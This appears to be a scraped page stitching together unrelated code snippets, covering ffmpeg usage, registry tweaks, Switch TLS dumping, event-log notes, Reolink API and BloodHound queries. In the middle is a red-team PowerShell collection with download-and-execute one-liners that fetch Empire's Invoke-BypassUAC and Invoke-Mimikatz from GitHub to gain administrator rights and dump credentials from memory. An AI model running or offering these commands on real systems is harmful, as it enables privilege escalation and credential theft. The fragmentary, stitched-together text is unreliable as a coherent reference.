Minimal example: transcode from MP3 to WMA:
ffmpeg -i input.mp3 output.wma
You can get the list of supported formats with:
ffmpeg -formats
You can get the list of installed codecs with:
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
{ | |
"queries": [{ | |
"name": "List all owned users", | |
"queryList": [{ | |
"final": true, | |
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m" | |
}] | |
}, | |
{ | |
"name": "List all owned computers", |
:: https://stealthpuppy.com/customize-the-windows-default-profile/#.XEfajs17mUm | |
:: https://helgeklein.com/blog/2011/12/customizing-the-default-profile/ | |
:: https://www.reddit.com/r/PowerShell/comments/8rupxv/unloading_registry_hive_with_a_script/ | |
:: https://blogs.technet.microsoft.com/deploymentguys/2009/10/29/configuring-default-user-settings-full-update-for-windows-7-and-windows-server-2008-r2/ | |
:: remove the double colon to activate the code if it is commented out | |
:: disable Cortana | |
:: https://www.addictivetips.com/windows-tips/disable-web-search-windows-10-april-update/ | |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /d 0 /t REG_DWORD /f | |
:: 5/9/2019 | |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /d 1 /t REG_DWORD /f |
This guide is for dumping Switch TLS traffic using the Charles web proxy. Please note that this is paid software.
Most Switch communications are over TLS - this includes NEX and Eagle communications (for Nintendo Switch Online)* as well as other servers such as BAAS (friends/status) and NPNS (notifications)
*NPLN, the new Switch online servers that Monster Hunter Rise demo used, cannot be dumped with Charles currently as it doesn't support gRPC - use grpc-dump to dump these communications - the gPRC section will explain this better.
While this doesn't carry much risk in theory, this is risky and could get your Switch banned as you must send your own Switch-unique client certificate.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
# PS : ChatGPT makes mistakes, consider "trust but verify" principle | |
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
#Events to Monitor | |
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor | |
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
#run | |
eventvwr.msc Event viewer | |
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
Event Viewer(Local)-Windows Logs (shutdown / restart ) |
I had some difficulty finding simple examples of how to use the Reolink API and ended up digging through some python implementations to figure out how it works.
The official documentation is available at https://bit.ly/3rWxG6e but it is a bit lacking, and the API is somewhat weird, which makes it difficult. You should still look at it though, as it lets you know what commands are available through the API.
The main weirdness is that even if you are sending one command at a time, the payload has to be an array of objects and the response is always an array of objects. Also, you have to pass the command both as a URL parameter and in the payload.
Included here are a small(ish) bash script (also requires jq) for running API commands against Reolink cameras or NVRs.